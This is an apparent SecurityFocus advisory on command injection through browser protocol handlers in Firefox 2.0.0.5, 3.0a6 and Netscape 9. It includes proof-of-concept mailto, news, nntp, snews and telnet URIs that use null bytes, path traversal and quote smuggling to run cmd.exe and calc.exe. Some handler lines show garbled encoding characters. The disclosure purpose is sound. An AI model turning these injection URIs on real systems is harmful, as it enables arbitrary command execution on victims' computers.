source: https://www.securityfocus.com/bid/25053/info
Multiple browsers are prone to vulnerabilities that let attackers inject commands through various protocol handlers.
Exploiting these issues allows remote attackers to pass and execute arbitrary commands and arguments through processes such as 'cmd.exe' by employing various URI handlers.
An attacker can exploit these issues to carry out various attacks by executing arbitrary commands on a vulnerable computer.
Exploiting these issues would permit remote attackers to influence command options that can be called through protocol handlers and to execute commands with the privileges of a user running the application. Successful attacks may result in a variety of consequences, including remote unauthorized access.
Mozilla Firefox 2.0.0.5, 3.0a6 and Netscape Navigator 9 are reported vulnerable to these issues. Other versions of these browsers and other vendors' browsers may also be affected.
mailto:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat
nntp:windows/system32/calc.exe%20"%20-%20"%20blah.bat
news:windows/system32/calc.exe%20"%20-%20"%20blah.bat
snews:windows/system32/calc.exe%20"%20-%20"%20blah.bat
telnet:windows/system32/calc.exe%20"%20-%20"%20blah.bat
telnet:// rundll32.exe url.dll,TelnetProtocolHandler %l
news:// â??%ProgramFiles%\Outlook Express\msimn.exeâ? /newsurl:%1
nntp:// â??%ProgramFiles%\Outlook Express\msimn.exeâ? /newsurl:%1
snews:// â??%ProgramFiles%\Outlook Express\msimn.exeâ? /newsurl:%1
mailto:// C:\lotus\notes\notes.exe /defini %1